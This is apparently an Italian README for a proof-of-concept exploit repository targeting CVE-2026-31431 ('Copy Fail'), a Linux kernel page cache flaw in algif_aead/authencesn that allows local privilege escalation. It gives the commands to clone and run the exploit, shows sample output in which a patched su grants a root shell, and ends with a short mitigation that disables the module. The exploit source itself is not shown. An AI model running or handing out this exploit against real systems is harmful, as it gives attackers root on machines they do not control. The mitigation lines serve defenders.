
CVE-2026-31431 - Vulnerabilità della Page Cache del kernel Linux
Questo progetto è fornito esclusivamente per:
L'autore e i collaboratori NON sono responsabili per uso improprio, danni, perdita di dati, interruzione del servizio o qualsiasi attività illegale effettuata utilizzando questo software.
Strumento di ricerca proof-of-concept per CVE-2026-31431, noto anche come "Copy Fail", una vulnerabilità del kernel Linux che interessa l'implementazione AEAD algif_aead / authencesn.
La vulnerabilità può consentire la corruzione della page cache in condizioni specifiche, portando potenzialmente a un'escalation dei privilegi locale sui sistemi vulnerabili.
Clona il repository:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
Quando richiesto:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
Se sei un amministratore di sistema e devi mitigare l'esposizione:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null